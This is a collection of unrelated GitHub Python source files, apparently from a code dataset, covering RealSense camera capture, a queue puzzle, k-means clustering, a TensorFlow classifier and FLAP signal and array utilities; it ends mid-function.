pipeline_wrapper = rs.pipeline_wrapper(pipeline)\n pipeline_profile = config.resolve(pipeline_wrapper)\n device = pipeline_profile.get_device()\n device_product_line = str(device.get_info(rs.camera_info.product_line))\n\n found_rgb = False\n for s in device.sensors:\n if s.get_info(rs.camera_info.name) == 'RGB Camera':\n found_rgb = True\n break\n if not found_rgb:\n print(\"The demo requires Depth camera with Color sensor\")\n exit(0)\n\n config.enable_stream(rs.stream.depth, 640, 480, rs.format.z16, 30)\n\n if device_product_line == 'L500':\n config.enable_stream(rs.stream.color, 960, 540, rs.format.bgr8, 30)\n else:\n config.enable_stream(rs.stream.color, 640, 480, rs.format.bgr8, 30)\n\n # Start streaming\n pipeline.start(config)\n\n try:\n while True:\n\n # Wait for a coherent pair of frames: depth and color\n frames = pipeline.wait_for_frames()\n depth_frame = frames.get_depth_frame()\n color_frame = frames.get_color_frame()\n if not depth_frame or not color_frame:\n continue\n\n # Convert images to numpy arrays\n depth_image = np.asanyarray(depth_frame.get_data())\n color_image = np.asanyarray(color_frame.get_data())\n\n # Apply colormap on depth image (image must be 
converted to 8-bit per pixel first)\n depth_colormap = cv2.applyColorMap(cv2.convertScaleAbs(depth_image, alpha=0.03), cv2.COLORMAP_JET)\n\n depth_colormap_dim = depth_colormap.shape\n color_colormap_dim = color_image.shape\n\n # If depth and color resolutions are different, resize color image to match depth image for display\n if depth_colormap_dim != color_colormap_dim:\n resized_color_image = cv2.resize(color_image, dsize=(depth_colormap_dim[1], depth_colormap_dim[0]), interpolation=cv2.INTER_AREA)\n images = np.hstack((resized_color_image, depth_colormap))\n else:\n images = np.hstack((color_image, depth_colormap))\n\n # Show images\n cv2.namedWindow('RealSense', cv2.WINDOW_AUTOSIZE)\n cv2.imshow('RealSense', images)\n \n k = cv2.waitKey(0)\n if k==27:\n print(\"hey\")\n cv2.destroyAllWindows()\n print(\"images\", images.shape)\n return images[:, :640, :]\n # break\n\n finally:\n\n # Stop streaming\n pipeline.stop()\n\n return resized_color_image\n\n\ndef red_to_green(img):\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n red_lo = np.array([50, 0, 0])\n red_hi = np.array([255, 255, 255])\n # Mask image to only select browns\n mask = cv2.inRange(hsv, red_lo, red_hi)\n cv2.imwrite(\"mask.jpg\", mask)\n # img[mask > 0] = img[mask > 0] * [0.3, 0, 0] + [0, 130, 0]\n img[mask > 0] = 0\n return img\n\n\ndef red_to_green_2(img):\n b, g, r = cv2.split(img) # get b,g,r\n rgb_img = cv2.merge([r, g, b])\n # plt.imshow(rgb_img)\n\n x, y, z = np.shape(img)\n red = np.zeros((x, y, z), dtype=int)\n green = np.zeros((x, y, z), dtype=int)\n blue = np.zeros((x, y, z), dtype=int)\n for i in range(0, x):\n for j in range(0, y):\n red[i][j][0] = rgb_img[i][j][0]\n green[i][j][1] = rgb_img[i][j][1]\n blue[i][j][2] = rgb_img[i][j][2]\n # plt.imshow(red)\n # # plt.show()\n # plt.imshow(green)\n # # plt.show()\n # plt.imshow(blue)\n # plt.show()\n\n retrack_original = np.zeros((x, y, z), dtype=int)\n for i in range(0, x):\n for j in range(0, y):\n retrack_original[i][j][0] = red[i][j][0] * 0.2 // 1\n retrack_original[i][j][1] = green[i][j][1]\n retrack_original[i][j][2] = blue[i][j][2]\n # cv2.imwrite('ori.jpg', retrack_original)\n plt.imshow(retrack_original)\n plt.show()\n return retrack_original\n\nif __name__==\"__main__\":\n # img = get_image_from_webcam()\n img = get_image_from_realsense()\n cv2.imwrite('he.png', img)\n # plt.imshow(img)\n # plt.imsave(img, \"hi.png\")\n\n # First import the library\n # import pyrealsense2 as rs\n\n # # Create a context object. This object owns the handles to all connected realsense devices\n # pipeline = rs.pipeline()\n # pipeline.start()\n\n # try:\n # while True:\n # # Create a pipeline object. 
This object configures the streaming camera and owns it's handle\n # frames = pipeline.wait_for_frames()\n # depth = frames.get_depth_frame()\n # if not depth: continue\n\n # # Print a simple text-based representation of the image, by breaking it into 10x20 pixel regions and approximating the coverage of pixels within one meter\n # coverage = [0]*64\n # for y in range(480):\n # for x in range(640):\n # dist = depth.get_distance(x, y)\n # if 0 < dist and dist < 1:\n # coverage[x//10] += 1\n\n # if y%20 == 19:\n # line = \"\"\n # for c in coverage:\n # line += \" .:nhBXWW\"[c//25]\n # coverage = [0]*64\n # print(line)\n\n # finally:\n # pipeline.stop()\n\n\ndef draw_all(one_frame):\n print(\"in drawww\")\n img = np.asarray(Image.open(one_frame.img_path))\n plt.imshow(img)\n img_name = one_frame.img_path.split('/')[-1].split('.')[0]\n pepper_utils.put_title(one_frame)\n\n for peduncle in one_frame.pepper_peduncle_detections.values():\n mask = peduncle.mask\n pepper_fruit_utils.draw_bounding_polygon(peduncle.conf, mask, one_frame.img_shape, color='black', fill=False)\n for pepper_fruit in one_frame.pepper_fruit_detections.values():\n xywh = pepper_fruit.xywh\n x = int(xywh[0])\n y = int(xywh[1])\n w = int(xywh[2])\n h = int(xywh[3])\n pepper_fruit_utils.draw_bounding_box(pepper_fruit.conf, x, y, w, h, color=\"black\", fill=False)\n\n for idx, pepper in one_frame.pepper_detections.items():\n r = np.round(np.random.rand(), 1)\n g = np.round(np.random.rand(), 1)\n b = np.round(np.random.rand(), 1)\n # a = np.round(np.clip(np.random.rand(), 0, 1), 1)\n color = (r, g, b)\n pepper_fruit = pepper.pepper_fruit\n pepper_peduncle = pepper.pepper_peduncle\n xywh = pepper_fruit.xywh\n x = int(xywh[0])\n y = int(xywh[1])\n w = int(xywh[2])\n h = int(xywh[3])\n pepper_fruit_utils.draw_bounding_box(pepper_fruit.conf, x, y, w, h, color=color)\n\n mask = pepper_peduncle.mask\n pepper_fruit_utils.draw_bounding_polygon(pepper_peduncle.conf, mask, one_frame.img_shape, color=color)\n poi_px = pepper.pepper_peduncle.poi_px\n plt.plot(poi_px[1], poi_px[0], 'bo', markersize=2)\n \n # plt.axis('off')\n\n plt.savefig(\n f\"{os.getcwd()}/result/{img_name}_pepper_poi_result.png\",\n bbox_inches='tight', pad_inches=0)\n plt.clf()\n plt.cla()\n print(\"well I don't like this\")","repo_name":"GetAGrip-dot-Ai/pepper_ws","sub_path":"pepper_utils.py","file_name":"pepper_utils.py","file_ext":"py","file_size_in_byte":9054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"19517968231","text":"from collections import deque\r\n\r\nn, m = map(int, input().split())\r\nq = input().split(' ')\r\nqueue = deque([i+1 for i in range(n)])\r\n\r\n#for i in range(n):\r\n# queue.append(i+1)\r\n\r\ncount = 0\r\nfor item in q:\r\n while True:\r\n if queue[0] == int(item):\r\n queue.popleft()\r\n break\r\n else:\r\n if queue.index(int(item)) < len(queue)/2:\r\n while queue[0] != int(item):\r\n queue.append(queue.popleft())\r\n count += 1\r\n else:\r\n while queue[0] != int(item):\r\n queue.appendleft(queue.pop())\r\n count += 1\r\n \r\n#print(queue)\r\nprint(count)","repo_name":"alswp006/IT_skill_up","sub_path":"정민/2주차/B1021.py","file_name":"B1021.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7010600635","text":"import pandas as pd\nfrom scipy.io import arff\nfrom sklearn import preprocessing\nimport numpy as np\n\nclass kMean(object):\n\n def __init__(self,dataset,*,K=3):\n 
self.dataset = dataset\n self.features =self.dataset.columns\n self.K = K\n self.centroids = self.dataset.sample(n=K).values\n\n\n def get_closest_centroid(self,data_point):\n diff = self.centroids - data_point\n square_diff = np.sqrt( diff ** 2 )\n euclidean_dist = np.sum(square_diff, axis=1) / len(data_point)\n index_min_element = np.where(euclidean_dist == np.amin(euclidean_dist))\n return index_min_element[0][0]\n\n def assign_centroid(self):\n data = self.dataset[self.features].values\n self.dataset[\"centroid\"] = list(map(self.get_closest_centroid, data))\n\n\n def calculate_mean_centroid(self):\n new_centroids = np.zeros(self.centroids.shape)\n for centroid_id in range(len(self.centroids)):\n closest_points = self.dataset[\"centroid\"] == centroid_id\n data_points = self.dataset.loc[closest_points.values]\n data_points = data_points[data_points.columns[:-1]]\n new_centroids[centroid_id] = np.mean(data_points.values,axis=0)\n return new_centroids\n\n def termination_condition(self,new_centroids):\n epsilon = 0.001\n abs_diff = np.abs(new_centroids - self.centroids)\n res = np.all(abs_diff < epsilon)\n return res\n\n def Run(self):\n while True:\n self.assign_centroid()\n new_centroids = self.calculate_mean_centroid()\n if self.termination_condition(new_centroids):\n break\n self.centroids = new_centroids\n","repo_name":"masenov9607/kMean","sub_path":"kMean.py","file_name":"kMean.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29396584191","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Mar 17 16:14:10 2018\r\n\r\n@author: YangGao\r\n\"\"\"\r\n\r\ncourses = ['History', 'Math', 'CompSci','Physics','English']\r\n \r\n\r\n\r\nfor index,course in enumerate(courses,start =1):\r\n print(index,course)\r\n\r\ncourses_str = '-'.join(courses)\r\n\r\nnew_list = courses_str.split('-')\r\nprint(new_list)\r\n\r\ncs_courses = {'Math', 'History', 'Physics','CompSci'}\r\nart_courses = {'Math', 'History', 'Art', 'Design'}\r\n\r\nprint(cs_courses.union(art_courses))\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"gaoyang97/Python--Basics","sub_path":"list.py","file_name":"list.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16409670546","text":"# Day_25_03_CarEvaluation.py\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn import model_selection, preprocessing\n\n\n# 문제 1\n# cars.data 파일을\n# x_train, x_test, y_train, y_test로 반환하는 함수를 만드세요\n\n# 문제 2\n# 모델을 구축하세요 (앙상블 적용)\n\ndef get_data():\n names = ['buying', 'maint', 'doors',\n 'persons', 'lug_boot', 'safety', 'class']\n\n cars = pd.read_csv('data/car.data',\n header=None,\n names=names)\n print(cars)\n\n enc = preprocessing.LabelEncoder()\n # enc.fit_transform(cars.values) # error\n\n buying = enc.fit_transform(cars.buying)\n maint = enc.fit_transform(cars.maint)\n doors = enc.fit_transform(cars.doors)\n persons = enc.fit_transform(cars.persons)\n lug_boot = enc.fit_transform(cars.lug_boot)\n safety = enc.fit_transform(cars.safety)\n classes = enc.fit_transform(cars['class'])\n\n print(buying.shape, buying.dtype) # (1728,) int32\n\n data = [buying, maint, doors, persons,\n lug_boot, safety, classes]\n data = np.transpose(data)\n print(data.shape, data.dtype) # (1728, 7) int32\n\n x = data[:, :-1]\n y = data[:, -1] # 반드시 1차원이어야 함\n\n return model_selection.train_test_split(x, y, train_size=0.7)\n\n\ndef 
show_accuracy_sparse(preds, labels):\n preds_arg = np.argmax(preds, axis=1)\n # y_arg = np.argmax(labels, axis=1)\n\n equals = (preds_arg == labels)\n print('acc :', np.mean(equals))\n\n\ndef model_car_evaluation_sparse():\n x_train, x_test, y_train, y_test = get_data()\n\n n_features = x_train.shape[1]\n n_classes = np.max(y_train) + 1\n w = tf.Variable(tf.random_uniform([n_features, n_classes]))\n b = tf.Variable(tf.random_uniform([n_classes]))\n\n ph_x = tf.placeholder(tf.float32)\n\n z = tf.matmul(ph_x, w) + b\n hx = tf.nn.softmax(z)\n\n loss_i = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=y_train, logits=z)\n loss = tf.reduce_mean(loss_i)\n\n optimizer = tf.train.GradientDescentOptimizer(0.1)\n train = optimizer.minimize(loss)\n\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n\n for i in range(1000):\n sess.run(train, {ph_x: x_train})\n print(i, sess.run(loss, {ph_x: x_train}))\n\n # ---------------------------- #\n\n preds_test = sess.run(hx, {ph_x: x_test})\n show_accuracy_sparse(preds_test, y_test)\n\n sess.close()\n\n\nmodel_car_evaluation_sparse()\n","repo_name":"yunhui21/CB_Ai_NLP","sub_path":"WeedDay/Day_25_03_CarEvaluation.py","file_name":"Day_25_03_CarEvaluation.py","file_ext":"py","file_size_in_byte":2493,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"73721217360","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 23 13:18:25 2019\n\nTools for the FLAP module\n\n@author: Sandor Zoletnik (zoletnik.sandor@ek-cer.hu)\nCentre for Energy Research\n\n\"\"\"\nimport copy\nimport numpy as np\nimport fnmatch\nfrom flap import VERBOSE\n#from decimal import Decimal #UNUSED\n\ndef del_list_elements(input_list, indices):\n \"\"\" delete elements from a list\n \"\"\"\n l = copy.deepcopy(input_list)\n for i in sorted(indices, reverse=True):\n del l[i]\n return l\n\n\ndef unify_list(list1, list2):\n \"\"\" Returns list with elements present in any of the two lists.\n Output list is sorted.\n \"\"\"\n unified_list = copy.deepcopy(list1)\n for d in list2:\n try:\n unified_list.index(d)\n except ValueError:\n unified_list.append(d)\n return sorted(unified_list)\n\ndef select_signals(signal_list, signal_spec):\n \"\"\"\n Selects signals from a signal list following signal specifications.\n\n signal_list: List of strings of possible signal names\n\n signal_spec: List of strings with signal specifications including wildcards\n Normal Unix file name wildcards are accepted and extended with\n [<num>-<num>] type expressions so as e.g. 
a channel range can be selected.\n\n Returs select_list, select_index\n select_list: List of strings with selected signal names\n select_index: List of indices to signal list of the selected signals\n\n Raises ValueError if there is no match for one specification\n \"\"\"\n\n if (type(signal_spec) is not list):\n _signal_spec = [signal_spec]\n else:\n _signal_spec = signal_spec\n\n if ((len(_signal_spec) == 0) or (signal_list == [])):\n raise ValueError(\"No signal list or signal specification.\")\n\n select_list = []\n select_index = []\n for ch in _signal_spec:\n # This will add a list of possible channel names to the _signal_spec while [<num>-<num>} is found\n startpos = 0\n extended = False\n extended_list = []\n while 1:\n # Searching for opening and closing []\n for i1 in range(startpos,len(ch)):\n if (ch[i1] == '['):\n break\n else:\n break\n if (i1 == len(ch)-1):\n break\n for i2 in range(i1+1,len(ch)):\n if (ch[i2] == ']'):\n break\n else:\n break\n # found the opening and closing bracket\n # Trying to interpret the string between the brackets as <int> - <int>\n try:\n nums = ch[i1+1:i2].split('-')\n nums = [int(nums[0]), int(nums[1])]\n # Extracting the strings before and after the []\n except Exception:\n if (i2 >= len(ch)-2):\n break\n startpos = i2+1\n continue\n if (i1 == 0):\n str1 = \"\"\n else:\n str1 = ch[0:i1]\n if (i2 < len(ch)-1):\n str2 = ch[i2+1:len(ch)]\n else:\n str2 = \"\"\n extended = True\n for i in range(nums[0],nums[1]+1):\n # Adding all the possible strings\n extended_list.append(str1+str(i)+str2)\n startpos = i2+1\n continue\n\n ch_match = False\n\n # if extended list is created not checking original name\n if (not extended):\n for i in range(len(signal_list)):\n if (fnmatch.fnmatch(signal_list[i], ch)):\n select_list.append(signal_list[i])\n select_index.append(i)\n ch_match = True\n if (extended):\n for i in range(len(signal_list)):\n for che in extended_list:\n if (fnmatch.fnmatch(signal_list[i], che)):\n select_list.append(signal_list[i])\n select_index.append(i)\n ch_match = True\n break\n if (not ch_match):\n raise ValueError(\"Signal name: \" + ch + \" is not present.\")\n\n return select_list, select_index\n\ndef chlist(chlist=None, chrange=None, prefix='', postfix=''):\n \"\"\"\n Creates a channel (signal) list name from a prefix, postfix a channel list and a list of channel\n ranges\n \"\"\"\n ch = []\n if (chlist is not None):\n ch.extend(chlist)\n if (chrange is not None):\n n = int(len(chrange) / 2)\n for i in range(n):\n ch.extend(list(range(chrange[i * 2],chrange[i * 2 + 1] + 1)))\n ch_str = []\n for c in ch:\n ch_str.append(prefix + str(c) + postfix)\n return ch_str\n\n\ndef submatrix_index(mx_shape, index):\n \"\"\" Given an arbitrary dimension matrix with shape mx_shape the tuple to\n extract a submatrix is created and returned.\n The elements in each dimension are selected by index.\n\n Input:\n mx_shape: Shape of the matrix\n index: Tuple or list of 1D numpy arrays. The length should be equal to the\n length of mx_shape. Each array contains the indices for the\n corresponding dimension.\n Return value:\n A tuple of index matrices. Each index matrix has the same shape as\n described by index. Each matrix contains the indices for one dimension\n of the matrix. 
This tuple can be directly used for indexing the matrix.\n \"\"\"\n\n index_arrays = []\n mx_dim = len(mx_shape)\n for i in range(mx_dim):\n # Creating a matrix with 1 element in each direction and the\n # number of elements in index[i] in the i-th dimension\n shape = [1] * mx_dim\n shape[i] = index[i].size\n # Creating this matrix\n ind = np.zeros(tuple(shape),dtype=int)\n # Creating a list of indices with 0 at all places except at i where '...'\n ind_ind = [0] * mx_dim\n ind_ind[i] = ...\n ind[tuple(ind_ind)] = index[i]\n # Expanding this matrix in all other dimensions\n for j in range(mx_dim):\n if (j != i):\n ind = np.repeat(ind,index[j].size,j)\n index_arrays.append(ind)\n\n# for i in range(len(mx_shape)): #THIS IS A SOLUTION FOR LARGE MATRICES, BUT NOT COMMITED\n# index_arrays.append(slice(min(index[i]),max(index[i])+1)) #DUE TO BEING UNTESTED. NEEDS TO BE UNCOMMENTED IF ONE WANTS TO USE IT\n return tuple(index_arrays)\n\n\ndef expand_matrix(mx,new_shape,dim_list):\n \"\"\" Insert new dimensions to a matrix so as it has <new shape> shape.\n The original dimensions are at dim_list dimensions\n\n Input:\n mx: The matrix with arbitrary dimensions.\n new_shape: This will be the new shape\n dim_list: This is a list of dimensions where mx is in the output\n matrix. len(dim_list) == mx.ndim\n \"\"\"\n\n act_dim = 0\n act_list = 0\n if (type(dim_list) is not list):\n _dim_list = dim_list\n else:\n _dim_list = dim_list\n for i in range(len(new_shape)):\n if ((act_list >= len(_dim_list)) or (act_dim < _dim_list[act_list])):\n mx = np.expand_dims(mx,act_dim)\n mx = np.repeat(mx,new_shape[act_dim],act_dim)\n else:\n act_list += 1\n act_dim += 1\n return mx\n \ndef flatten_multidim(mx, dim_list):\n \"\"\" Flatten the dimensions in dim_list to dim_list[0]\n Returns the modified matrix and a mapping from the original to the new dimension list.\n The mapping will be None for the flattened dimension in dim_list even if\n flattening was not done. 
The dimension numbers in the dimension list assume that\n the flattened dimensions are removed.\n \"\"\"\n if (len(dim_list) <= 1):\n dimension_mapping = [None]*mx.ndim\n count = 0\n for i in range(mx.ndim):\n try:\n dim_list.index(i)\n except ValueError:\n dimension_mapping[i] = count\n count += 1\n return mx, dimension_mapping\n\n out_shape = []\n flat_size = 1\n for d in dim_list:\n flat_size *= mx.shape[d]\n #This is the mapping from the remaining dimensions to the output matrix dimensions\n out_dim_mapping = [None]*mx.ndim\n flat_dim_mapping = [None]*mx.ndim\n out_dim_counter = 0\n flat_dim_counter = 0\n for i in range(mx.ndim):\n try:\n dim_list_i = dim_list.index(i)\n if (dim_list_i == 0):\n out_shape.append(flat_size)\n flat_dim_counter += 1\n except ValueError:\n out_shape.append(mx.shape[i])\n out_dim_mapping[i] = out_dim_counter\n flat_dim_mapping[i] = flat_dim_counter\n out_dim_counter += 1\n flat_dim_counter += 1\n\n # Creating index matrices for each dimension of dimension list and flattening them to\n # create index\n flat_submx_shape = [ mx.shape[x] for x in dim_list]\n ind_flat_list =[]\n for i in range(len(flat_submx_shape)):\n ind = np.arange(flat_submx_shape[i])\n ind_flat_list.append(expand_matrix(ind, flat_submx_shape, [i]).flatten())\n # Creating as many index matrices as the number of dimensions of mx\n mx_list = []\n for i in range(mx.ndim):\n try:\n dim_list_i = dim_list.index(i)\n ind = ind_flat_list[dim_list_i]\n out_dim = dim_list[0]\n except ValueError:\n ind = np.arange(mx.shape[i])\n out_dim = flat_dim_mapping[i]\n mx_list.append(expand_matrix(ind, out_shape, [out_dim]))\n\n return mx[tuple(mx_list)], out_dim_mapping\n\ndef multiply_along_axes(a1_orig, a2_orig, axes,keep_a1_dims=True):\n \"\"\" \n Multiplies two arrays along given axes. \n INPUT:\n a1_orig: Array 1.\n a2_orig: Array 2.\n axes: List of two axis numbers or list of two lists of axis numbers\n keep_1_dims: (bool) \n If True: The output array has dimensions of a1 followed by a2 with the common dims removed\n If False: The output array has the a1 dimensions without common dims then the common dims\n followed by a2 with the common dims removed\n Return values:\n a, axis_source, axis_number\n a: An array with dimension number a1.dim+a2.dim-1. 
\n axis_source: List of integers telling the source array for each output axis ( 0 or 1)\n axis_number: Axis numbers in the arrays listed in axes_source\n \"\"\"\n if (type(axes[0]) is not list):\n axes[0] = [axes[0]]\n if (type(axes[1]) is not list):\n axes[1] = [axes[1]]\n for i in range(len(axes[0])): \n if (a1_orig.shape[axes[0][i]] != a2_orig.shape[axes[1][i]]):\n raise ValueError(\"Incompatible shapes.\")\n\n a1 = a1_orig\n a2 = a2_orig\n a1_shape = a1.shape\n a1_axes = list(range(a1.ndim))\n a2_shape = a2.shape\n a2_axes = list(range(a2.ndim))\n for i in range(len(axes[0])):\n # Finding the axis\n ind = a1_axes.index(axes[0][i])\n # Move from a1 the processing axis to the end\n a1 = np.moveaxis(a1,ind,-1)\n # Following this change in the axis list\n del a1_axes[ind]\n a1_axes.append(axes[0][i])\n # Move from a2 the processing axis to the front\n ind = a2_axes.index(axes[1][i])\n a2 = np.moveaxis(a2,ind,i)\n del a2_axes[ind]\n a2_axes.insert(i,axes[1][i])\n out_shape = list(a1.shape) + list(a2.shape)[len(axes[0]):]\n for i in range(len(out_shape)-len(a1_shape)):\n a1 = np.expand_dims(a1,-1)\n for i in range(len(out_shape)-len(a2_shape)):\n a2 = np.expand_dims(a2,0) \n r = a1 * a2\n if (keep_a1_dims):\n # Moving the processing axes back where they were in the original array\n # We have to move the axis in increasing destination order\n sort_axes = axes[0]\n sort_axes.sort()\n for i in range(len(sort_axes)):\n ind = a1_axes.index(sort_axes[i])\n r = np.moveaxis(r, ind, sort_axes[i])\n del a1_axes[ind]\n a1_axes.insert(sort_axes[i],sort_axes[i])\n axis_source = [0]*a1_orig.ndim + [1]*(a2_orig.ndim - len(axes[0]))\n axis_number = a1_axes + a2_axes[len(axes[1]):]\n return r, axis_source, axis_number\n\ndef move_axes_to_end(mx_orig,axes):\n \"\"\" Moves the listed axes to the end.\n \"\"\"\n mx = mx_orig\n mx_axes = list(range(mx.ndim))\n for i in range(len(axes)):\n # Finding the axis\n ind = mx_axes.index(axes[i])\n # Move from to the end\n mx = np.moveaxis(mx,ind,-1)\n # Following this change in the axis list\n del mx_axes[ind]\n mx_axes.append(axes[i])\n return mx, mx_axes\n \ndef move_axes_to_start(mx_orig,axes):\n \"\"\" Moves the listed axes to the start axes.\n \"\"\"\n mx = mx_orig\n mx_axes = list(range(mx.ndim))\n for i in range(len(axes)):\n # Finding the axis\n ind = mx_axes.index(axes[i])\n # Move from to the end\n mx = np.moveaxis(mx,ind,0)\n # Following this change in the axis list\n del mx_axes[ind]\n mx_axes.insert(i,axes[i])\n return mx, mx_axes\n \ndef find_str_match(value, options):\n \"\"\"\n Given value string and a list of possibilities in the list of strings option\n find matches assuming value is an abbreviation. Return ValueError if no match \n or multiple match is found.\n If one match is found return the matching string\n \"\"\"\n if (type(value) is not str):\n raise TypeError(\"Invalid value.\")\n matches = []\n for s in options:\n if (value == s[0:min([len(value),len(s)])]):\n if (len(matches) != 0):\n raise ValueError(\"Too short abbreviation: \"+value)\n matches.append(s)\n if (len(matches) == 0):\n raise ValueError(\"No match for \"+value)\n return matches[0]\n\ndef grid_to_box(xdata,ydata):\n \"\"\"\n Given 2D x and y coordinate matrices create box coordinates around the points as\n needed by matplotlib.pcolomesh.\n xdata: X coordinates. \n ydata: Y coordinates. 
\n In both arrays x direction is along first dimension, y direction along second dimension.\n Returns xbox, ybox.\n \"\"\"\n xdata = np.transpose(xdata.astype(float))\n xbox_shape = list(xdata.shape)\n xbox_shape[0] += 1\n xbox_shape[1] += 1\n xbox = np.empty(tuple(xbox_shape),dtype=xdata.dtype)\n xbox[1:,1:-1] = (xdata[:,:-1] + xdata[:,1:]) / 2 \n xbox[1:-1,1:-1] = (xbox[2:,1:-1] + xbox[1:-1,1:-1]) / 2\n xbox[1:-1,0] = ((xdata[1:,0] + xdata[:-1,0]) / 2 - xbox[1:-1,1]) * 2 + xbox[1:-1,1]\n xbox[1:-1,-1] = ((xdata[1:,-1] + xdata[:-1,-1]) / 2 - xbox[1:-1,-2]) * 2 + xbox[1:-1,-2]\n xbox[0,1:-1] = ((xdata[0,:-1] + xdata[0,1:]) / 2 - xbox[1,1:-1]) * 2 + xbox[1,1:-1]\n xbox[-1,1:-1] = ((xdata[-1,:-1] + xdata[-1,1:]) / 2 - xbox[-2,1:-1]) * 2 + xbox[-2,1:-1]\n xbox[0,0] = xbox[1,1] + (xbox[0,1] - xbox[1,1]) + (xbox[1,0] - xbox[1,1])\n xbox[-1,-1] = xbox[-2,-2] + (xbox[-1,-2] - xbox[-2,-2]) + (xbox[-2,-1] - xbox[-2,-2])\n xbox[0,-1] = xbox[1,-2] + (xbox[0,-2] - xbox[1,-2]) + (xbox[1,-1] - xbox[1,-2]) \n xbox[-1,0] = xbox[-2,1] + (xbox[-1,1] - xbox[-2,1]) + (xbox[-2,0] - xbox[-2,1])\n \n ydata = np.transpose(ydata.astype(float))\n ybox_shape = list(ydata.shape)\n ybox_shape[0] += 1\n ybox_shape[1] += 1\n ybox = np.empty(tuple(ybox_shape),dtype=ydata.dtype)\n ybox[1:,1:-1] = (ydata[:,:-1] + ydata[:,1:]) / 2 \n ybox[1:-1,1:-1] = (ybox[2:,1:-1] + ybox[1:-1,1:-1]) / 2\n ybox[1:-1,0] = ((ydata[1:,0] + ydata[:-1,0]) / 2 - ybox[1:-1,1]) * 2 + ybox[1:-1,1]\n ybox[1:-1,-1] = ((ydata[1:,-1] + ydata[:-1,-1]) / 2 - ybox[1:-1,-2]) * 2 + ybox[1:-1,-2]\n ybox[0,1:-1] = ((ydata[0,:-1] + ydata[0,1:]) / 2 - ybox[1,1:-1]) * 2 + ybox[1,1:-1]\n ybox[-1,1:-1] = ((ydata[-1,:-1] + ydata[-1,1:]) / 2 - ybox[-2,1:-1]) * 2 + ybox[-2,1:-1]\n ybox[0,0] = ybox[1,1] + (ybox[0,1] - ybox[1,1]) + (ybox[1,0] - ybox[1,1])\n ybox[-1,-1] = ybox[-2,-2] + (ybox[-1,-2] - ybox[-2,-2]) + (ybox[-2,-1] - ybox[-2,-2])\n ybox[0,-1] = ybox[1,-2] + (ybox[0,-2] - ybox[1,-2]) + (ybox[1,-1] - ybox[1,-2]) \n ybox[-1,0] = ybox[-2,1] + (ybox[-1,1] - ybox[-2,1]) + (ybox[-2,0] - ybox[-2,1])\n \n return xbox,ybox\n\ndef time_unit_translation(time_unit=None,max_value=None):\n if (str(type(time_unit)) == 'str' or \n str(type(time_unit)) == \"<class 'numpy.str_'>\"):\n _time_unit=time_unit.lower()\n else:\n _time_unit=time_unit\n if ((_time_unit == ' ') or (_time_unit is None)) and (max_value is not None):\n #Raise awareness:\n if VERBOSE:\n print('Time unit: \\''+str(_time_unit)+'\\'')\n print('Time unit translation based on values only works for shots under 1000s.')\n value_translation=[[1,1e3,1e6,1e9,1e12],\n ['s','ms','us','ns','ps']]\n for i in range(len(value_translation[0])-1):\n if (max_value > value_translation[0][i] and max_value < value_translation[0][i+1]):\n _time_unit=value_translation[1][i]\n elif max_value > value_translation[0][4]:\n _time_unit=value_translation[1][4]\n translation={'seconds':1,\n 'second':1,\n 's':1,\n 'milliseconds':1e-3,\n 'millisecond':1e-3,\n 'ms':1e-3,\n 'microseconds':1e-6,\n 'microsecond':1e-6,\n 'us':1e-6,\n 'nanoseconds':1e-9,\n 'nanosecond':1e-9,\n 'ns':1e-9,\n 'picoseconds':1e-12,\n 'picosecond':1e-12,\n 'ps':1e-12\n }\n if (_time_unit in translation.keys()):\n return translation[_time_unit]\n else:\n if type(_time_unit) is not str:\n backwards_translation=[[1,1e-3,1e-6,1e-9,1e-12],\n ['s','ms','us','ns','ps']]\n for i in range(len(backwards_translation[0])):\n if backwards_translation[0][i] == _time_unit:\n return backwards_translation[1][i]\n else:\n print(_time_unit+' was not found in the translation. 
Returning 1.')\n return 1\n \ndef spatial_unit_translation(spatial_unit=None):\n _spatial_unit=spatial_unit.lower()\n translation={'meters':1,\n 'meter':1,\n 'm':1,\n 'millimeters':1e-3,\n 'millimeter':1e-3,\n 'mm':1e-3,\n 'micrometers':1e-6,\n 'micrometer':1e-6,\n 'um':1e-6,\n 'nanometers':1e-9,\n 'nanometer':1e-9,\n 'nm':1e-9,\n 'picometers':1e-12,\n 'picometer':1e-12,\n 'pm':1e-12,\n }\n if (_spatial_unit in translation.keys()):\n return translation[_spatial_unit]\n else:\n print(_spatial_unit+' was not found in the translation. Returning 1.')\n return 1\n \ndef unit_conversion(original_unit=None,\n new_unit=None\n ):\n \n #The code provides a unit conversion between any unit types for most\n #of the prefixes. \n #There are certain limitations:\n # The unit compatibility is not checked (e.g. mm-->MegaHertz is allowed)\n \n known_conversions_full={'Terra':1e12,\n 'Giga':1e9,\n 'Mega':1e6,\n 'kilo':1e3,\n 'milli':1e-3,\n 'micro':1e-6,\n 'nano':1e-9,\n 'pico':1e-12,\n }\n \n known_conversions_short={'T':1e12,\n 'G':1e9,\n 'M':1e6,\n 'k':1e3,\n 'm':1e-3,\n 'u':1e-6,\n 'n':1e-9,\n 'p':1e-12\n }\n \n original_unit_translation=None\n new_unit_translation=None\n \n #Trying to find the long unit names in the inputs\n \n for keys_full in known_conversions_full:\n if keys_full in original_unit:\n original_unit_translation=known_conversions_full[keys_full]\n if keys_full in new_unit:\n new_unit_translation=known_conversions_full[keys_full]\n \n if original_unit_translation is None:\n if len(original_unit) == 1 or len(original_unit) > 3 : # SI units are longer than 3 if using the full name\n original_unit_translation=1.\n else:\n for keys_short in known_conversions_short:\n if keys_short == 